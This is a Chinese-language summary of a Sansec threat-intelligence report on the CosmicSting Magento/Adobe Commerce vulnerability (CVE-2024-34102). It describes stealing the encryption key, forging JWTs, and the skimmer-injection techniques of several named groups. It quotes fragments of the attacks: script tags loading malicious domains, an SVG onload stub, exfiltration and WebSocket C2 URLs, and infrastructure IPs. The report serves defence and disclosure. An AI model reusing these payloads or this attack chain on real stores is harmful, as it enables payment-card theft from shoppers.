https://sansec.io/research/cosmicsting
摘要
CosmicSting漏洞(CVE-2024-34102)是近年来影响Magento和Adobe Commerce商店最严重的安全问题,攻击者利用该漏洞窃取加密密钥并注入恶意脚本,从而窃取客户数据并可能远程执行代码。文章详述了攻击的影响、受影响的版本、攻击阶段、时间线、防御措施以及多个攻击团伙的行动模式。
关键点
- CosmicSting漏洞是近年来最严重的Magento和Adobe Commerce漏洞,影响范围大,攻击频率高达每小时5至30次。
- 攻击者通过窃取
app/etc/env.php
文件中的加密密钥,利用Magento API修改CMS块,注入恶意JavaScript以窃取客户数据。
- 漏洞的CVSS评分为9.8(满分10),Adobe建议立即修补漏洞。
- 受影响的版本包括Magento和Adobe Commerce 2.4.7及更早版本。
- 攻击分阶段进行,包括读取加密密钥、生成JSON Web Token(JWT)以访问API并注入恶意脚本。
- 时间线显示从漏洞修复发布到大规模攻击仅用了15天,多个攻击波次导致大规模数据泄露。
- 防御措施包括升级到最新版本、更换加密密钥并禁用旧密钥,或应用Adobe提供的独立补丁。
- 临时解决方案包括阻止对CMS块API的请求,但无法完全防止攻击。
- 多个攻击团伙参与,包括Ondatry、Polyovki、Bobry、Surki、Khomyaki等,每个团伙使用不同的技术和目标。
- 攻击者利用伪造的支付表单、隐藏恶意代码、WebSocket通信等多种方式窃取数据。
- 攻击者使用多个恶意域名和IP地址进行数据外泄和攻击。
- 文章列出了详细的攻击指标,包括恶意域名、IP地址和恶意脚本特征。
根据文章内容,攻击团伙使用了以下技术手段:
一、数据窃取与密钥利用
XXE漏洞利用
- 通过构造恶意XML请求读取
app/etc/env.php
文件,窃取加密密钥(encryption_key
)
- 典型攻击日志示例:
157.230.230.193 - "POST /rest/V1/guest-carts/123456/estimate-shipping-methods HTTP/1.1" 404 148
API滥用
- 使用被盗密钥生成JWT令牌,通过Magento API修改CMS块(如
PUT /V1/cmsBlock/{id}
)
二、恶意脚本注入技术
隐藏编码技术
- Group Bobry:利用空白Unicode字符(如
\u2003
、\u2006
)将二进制代码嵌入HTML
- Group Laski:通过动态偏移量解码(
String.fromCharCode(code - [动态数值])
)绕过静态分析
伪装技术
- Group Polyovki:注入
<script src="https://cdnstatics.net/lib.js">
直接加载恶意库
- Group Surki:通过SVG图像
onload
事件触发恶意代码(示例代码:
<svg onload="!function(e){...}(atob('...'))">
)
CSP绕过
- Group Surki:通过Google翻译服务代理加载恶意脚本(如
https://translate.google.co.in/translate?hl=gu&sl=en&u=恶意URL
)
三、持久化与远程控制
WebSocket通信
- Group Surki:使用WebSocket(如
wss://accept.bar/common
)动态下发攻击指令
- Group Burunduki:通过自定义端口WebSocket(
wss://jgueurystatic.xyz:8101
)实时更新恶意逻辑
远程代码执行(RCE)
- Group Belki:结合CNEXT漏洞(CVE-2024-2961)在服务器植入后门进程(如
[raid5wq]
、[kswapd0]
)
四、数据外泄技术
加密与混淆
- Group Ondatry:使用自定义混淆算法(如变量名
d57841
、v69451
动态拼接恶意代码)
- Group Khomyaki:使用JSEncrypt库加密数据后外传
隐蔽通道
- Group Peschanki:通过
__ffsj
Cookie存储数据,利用阿里云IP(https://106.14.40.200
)外泄
- Group Bobry:将数据伪装成图片请求(如
https://statspots.com/get/?s=加密数据
)
五、基础设施特征
| 团伙名称 | 恶意域名示例 | 服务器IP(示例) | 注册商/托管商 |
|----------------|---------------------------------------|-----------------------|---------------------|
| Group Polyovki | cdnstatics.net
| 185.175.225.116 | Cloudflare |
| Group Khomyaki | jgueurystatic.xyz
| 82.202.165.xx(俄罗斯JSC网络) | Hostinger |
| Group Laski | markettz.com
、statepulseapp.com
| 142.252.84.169 | Namecheap |
六、攻击链整合示例
graph TD
A[扫描暴露的Magento实例] --> B[利用CVE-2024-34102读取env.php]
B --> C{是否获取有效密钥?}
C -->|是| D[生成JWT接管API]
C -->|否| A
D --> E[修改CMS块注入恶意JS]
E --> F[劫持支付表单]
F --> G[通过WebSocket/C2服务器外传数据]